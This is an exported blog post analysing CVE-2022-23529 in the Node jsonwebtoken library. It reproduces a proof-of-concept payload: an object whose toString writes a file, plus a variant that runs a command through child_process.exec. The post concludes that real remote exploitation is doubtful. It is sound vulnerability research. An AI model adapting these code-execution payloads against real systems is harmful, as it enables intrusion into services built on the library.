{"id":61142,"date":"2023-01-18T17:27:53","date_gmt":"2023-01-18T09:27:53","guid":{"rendered":"https:\/\/version-2.com\/?p=61142"},"modified":"2024-09-13T16:31:49","modified_gmt":"2024-09-13T08:31:49","slug":"jwt-arbitrary-command-execution-cve-2022-23529","status":"publish","type":"post","link":"https:\/\/version-2.com\/zh\/2023\/01\/jwt-arbitrary-command-execution-cve-2022-23529\/","title":{"rendered":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"61142\" class=\"elementor elementor-61142\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4da8c5f9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4da8c5f9\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;decf9c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&
quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-133ba185\" data-id=\"133ba185\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc2da8d post-content elementor-widget elementor-widget-text-editor\" data-id=\"fc2da8d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"news-detail-inner-content\" data-v-85c4bf60=\"\" data-v-0bbc59dc=\"\"><h3><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\" width=\"511\" height=\"510\" \/><\/h3><h3>Introduction<\/h3><p>Arbitrary command execution has been found in JsonWebToken version 8.5.1 and lower, and registered as CVE-2022\u201323529<\/p><h4>Library details<\/h4><ul><li>Description:<\/li><\/ul><p>JSON Web Token (JWT) is an open standard (<a href=\"https:\/\/tools.ietf.org\/html\/rfc7519\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">RFC 7519<\/a>) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. 
JWTs can be signed using a secret (with the <strong>HMAC<\/strong> algorithm) or a public\/private key pair using <strong>RSA<\/strong> or <strong>ECDSA<\/strong>.<\/p><ul><li>Website: <a href=\"https:\/\/jwt.io\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/jwt.io\/<\/a><\/li><li>Source code: <a href=\"https:\/\/github.com\/auth0\/node-jsonwebtoken\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/auth0\/node-jsonwebtoken<\/a><\/li><\/ul><h4>The vulnerability<\/h4><p>When a user accesses a page, the token is passed to the <a href=\"https:\/\/github.com\/auth0\/node-jsonwebtoken#jwtverifytoken-secretorpublickey-options-callback\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">verify<\/a> method in the back-end. The verify method takes three parameters: token, secretOrPublicKey, [options, callback].<\/p><p>If a payload object is passed as the second parameter (secretOrPublicKey), that payload will be executed.<\/p><h3>The End\u00a0Game<\/h3><p>Based on what unit42 discovered, and also based on my analysis, it\u2019s not easy or obvious how to achieve full RCE.<\/p><p>I want to show the analysis I did here, and my final thoughts explaining why I don\u2019t think this is RCE, or why I don\u2019t see real exploitation behind it.<\/p><p>Maybe I\u2019m wrong, or maybe I\u2019m right\u00a0\ud83d\ude00 Who knows!<\/p><h3>Prerequisites<\/h3><ul><li>Install nodejs<\/li><\/ul><pre><code>sudo apt install nodejs<\/code><\/pre><ul><li>Install npm<\/li><\/ul><pre><code>sudo apt install npm<\/code><\/pre><ul><li>Install jsonwebtoken version 8.5.1 or earlier.<\/li><\/ul><pre><code>npm i jsonwebtoken@8.5.1<\/code><\/pre><ul><li>Understanding of how jsonwebtoken works<\/li><\/ul><p>I won\u2019t go into detail here, but I will explain the basics of the structure of JWT and how it works.<\/p><p>I will provide references so you can dive in depth with it if you like.<\/p><p>Basically, a JWT consists of three parts:<\/p><ul><li>Header: 
Algorithm &amp; Token Type<\/li><li>Payload: Data<\/li><li>Verify Signature<\/li><\/ul><p>Example:<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*_HdJqhV_hMbLO0cNXPm-hQ.png\" \/><\/p><p>When the user logs in, the request with the username and password goes to the Auth server; the Auth server verifies the username and password and, based on that, generates a JWT for this user.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*Gf4w3BtnQGQLPSkvwzxeSg.png\" \/><\/p><p>Now each time the user visits any page or route, the JWT is sent along in the request headers.<\/p><p><a href=\"https:\/\/dev.to\/kcdchennai\/how-jwt-json-web-token-authentication-works-21e7\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/dev.to\/kcdchennai\/how-jwt-json-web-token-authentication-works-21e7<\/a><\/p><p><a href=\"https:\/\/jwt.io\/introduction\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/jwt.io\/introduction<\/a><\/p><h3>Dynamic Analysis<\/h3><p>I started with reproducing what unit42 already explained.<\/p><p>I\u2019m using Ubuntu, so you can start nodejs by typing the command<\/p><pre><code>nodejs<\/code><\/pre><p>Import jsonwebtoken.<\/p><pre><code>jwt = require('jsonwebtoken');<\/code><\/pre><p>Generate a token.<\/p><pre><code>token = jwt.sign({\"x\":\"y\"}, 'some_secret');<\/code><\/pre><p>This is the payload unit42 used.<\/p><pre><code>var mal_obj = { toString : ()=&gt; {console.log('PWNED!!!');process.on('exit', ()=&gt; {require('fs').writeFileSync('malicious.txt', 'PWNED!!!!');});process.exit(0)}}<\/code><\/pre><p>Now, pass the token and the payload variable to verify.<\/p><pre><code>jwt.verify(token, mal_obj)<\/code><\/pre><p>You will see PWNED!!! 
printed on the console.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*OIPcC5UrZixvPK8n6v25yg.png\" \/><\/p><p>A file called malicious.txt has also been created.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*kgfJgJozpqd2RHEvhc7xWQ.png\" \/><\/p><p>And \u201cPWNED!!!!\u201d has been written inside the file.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*vda_4wDIdnkLSHXu_fjlfw.png\" \/><\/p><p>This happened because that is exactly what the payload we executed does.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*AqBZcyuab_2Z8HA7CCjoew.png\" \/><\/p><p>I also wanted to see if I could execute commands, so I used this payload.<\/p><pre><code>var mal_obj = { toString : ()=&gt; {process.on('exit', ()=&gt; {require('child_process').exec('firefox');});process.exit(0)}};<\/code><\/pre><p>And I got firefox launched.<\/p><h3>Static Analysis<\/h3><p>Let\u2019s do some code review and see what went wrong.<\/p><p>Download the source code of jsonwebtoken 8.5.1 from here:<\/p><p><a href=\"https:\/\/github.com\/auth0\/node-jsonwebtoken\/releases\/tag\/v8.5.1\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/auth0\/node-jsonwebtoken\/releases\/tag\/v8.5.1<\/a><\/p><p>Open verify.js.<\/p><p>Here is the vulnerable snippet of the code, based on the unit42 report.<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*Rf5xHf5WJ7HXYvrCRtXnYw.png\" \/><\/p><p>After I tried to craft\/edit\/manipulate the JWT token, it didn\u2019t really work.<\/p><p>In fact, it makes sense why it didn\u2019t work: the payload is supposed to go into the second parameter of the verify method (marked in red), but the token is the first parameter (marked in blue).<\/p><p><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*t3AtgWp26UAVlQI5idLtHA.png\" 
\/><\/p><h3>Final thoughts<\/h3><p>To be honest, I\u2019m not sure how this can be exploited remotely, or even if you have access to the backend. However, based on what\u2019s mentioned in the \u201cExploitation Prerequisites\u201d section of the unit42 report, it looks like there is no obvious scenario to exploit this.<\/p><p>Also, based on the comments on the GitHub commit <a href=\"https:\/\/github.com\/auth0\/node-jsonwebtoken\/commit\/e1fa9dcc12054a8681db4e6373da1b30cf7016e3#diff-a32f3d1ddd0e3a886fef0b4523039c3b786a5ac01aea6b13421fa494187762e7\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">here<\/a>, it looks like a lot of people agree with that as well.<\/p><p><strong>Some ideas for more in-depth research I was thinking about:<\/strong><\/p><ul><li>Maybe finding some misconfiguration scenario for JWT would help with exploiting this vulnerability.<\/li><li>I was thinking about how those parameters get stored. For example, in smart contracts, variables are laid out in memory like slots, so you could overwrite the second variable, in our case the secretOrPublicKey variable.<\/li><\/ul><p>#jwt #cve #analysis #CVE-2022-23529<\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8085a61 post-content elementor-widget elementor-widget-shortcode\" data-id=\"8085a61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" 
data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" 
data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"39690\" class=\"elementor elementor-39690\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" 
data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ff2a228 elementor-widget elementor-widget-text-editor\" data-id=\"ff2a228\" data-element_type=\"widget\" data-e-type=\"widget\" 
data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<p><b>About VRX<\/b><br><b>VRX&nbsp;<\/b>is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Introduction Arbitrary command execution has been found [&hellip;]<\/p>\n","protected":false},"author":148637484,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[476,1075,61],"tags":[477,1076],"class_list":["post-61142","post","type-post","status-publish","format-standard","hentry","category-vrx","category-year2023","category-press-release","tag-vrx","tag-1076"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529\" \/>\n<meta property=\"og:locale\" content=\"zh_HK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"JWT Arbitrary Command 
Execution\u200a-\u200aCVE-2022\u201323529 - Version 2\" \/>\n<meta property=\"og:description\" content=\"Introduction Arbitrary command execution has been found [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2023-01-18T09:27:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-09-13T08:31:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\" \/>\n<meta name=\"author\" content=\"versionpan\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"versionpan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u8a08\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/01\\\/jwt-arbitrary-command-execution-cve-2022-23529\\\/\"},\"author\":{\"name\":\"versionpan\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/103ffe36f7fd34a1cc126a30431b94d8\"},\"headline\":\"JWT Arbitrary Command 
Execution\u200a-\u200aCVE-2022\u201323529\",\"datePublished\":\"2023-01-18T09:27:53+00:00\",\"dateModified\":\"2024-09-13T08:31:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/01\\\/jwt-arbitrary-command-execution-cve-2022-23529\\\/\"},\"wordCount\":682,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\",\"keywords\":[\"vRx\",\"2023\"],\"articleSection\":[\"vRx\",\"2023\",\"Press Release\"],\"inLanguage\":\"zh-HK\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/01\\\/jwt-arbitrary-command-execution-cve-2022-23529\\\/\",\"url\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529\",\"name\":\"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 
2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\",\"datePublished\":\"2023-01-18T09:27:53+00:00\",\"dateModified\":\"2024-09-13T08:31:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#breadcrumb\"},\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage\",\"url\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\",\"contentUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/jwt-arbitrary-command-execution-cve-2022-23529#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 
2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-HK\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/103ffe36f7fd34a1cc126a30431b94d8\",\"name\":\"versionpan\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"caption\":\"versionpan\"},\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/author\\\/versionpan\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529","og_locale":"zh_HK","og_type":"article","og_title":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 2","og_description":"Introduction Arbitrary command execution has been found [&hellip;]","og_url":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529","og_site_name":"Version 2","article_published_time":"2023-01-18T09:27:53+00:00","article_modified_time":"2024-09-13T08:31:49+00:00","og_image":[{"url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max","type":"","width":"","height":""}],"author":"versionpan","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"versionpan","\u9810\u8a08\u95b1\u8b80\u6642\u9593":"5 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#article","isPartOf":{"@id":"https:\/\/version-2.com\/2023\/01\/jwt-arbitrary-command-execution-cve-2022-23529\/"},"author":{"name":"versionpan","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/103ffe36f7fd34a1cc126a30431b94d8"},"headline":"JWT Arbitrary Command 
Execution\u200a-\u200aCVE-2022\u201323529","datePublished":"2023-01-18T09:27:53+00:00","dateModified":"2024-09-13T08:31:49+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2023\/01\/jwt-arbitrary-command-execution-cve-2022-23529\/"},"wordCount":682,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max","keywords":["vRx","2023"],"articleSection":["vRx","2023","Press Release"],"inLanguage":"zh-HK"},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2023\/01\/jwt-arbitrary-command-execution-cve-2022-23529\/","url":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529","name":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529 - Version 